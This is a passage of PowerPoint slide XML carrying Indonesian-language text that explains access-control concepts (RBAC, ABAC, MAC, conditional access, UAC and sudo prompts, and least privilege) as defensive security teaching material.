            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>demikian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, RBAC, ABAC, dan MAC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nondiskresioner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>). Akses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersyarat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersyarat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memonitor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perilaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sepanjang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kondisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpenuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menangguhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meminta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ulang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>verifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langkah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Akun </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (UAC) dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembatasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersyarat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diminta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfirmasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ABAC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sejumlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriteria</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersyarat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</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73</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6692421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Penugasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Hak Istimewa Paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Sedikit</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Least privilege </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seorang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prinsipal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seminimal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyelesaikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tugas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>wewenangnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disusupi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bawah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kendali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkecil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>desain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedikit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prinsip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>desain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
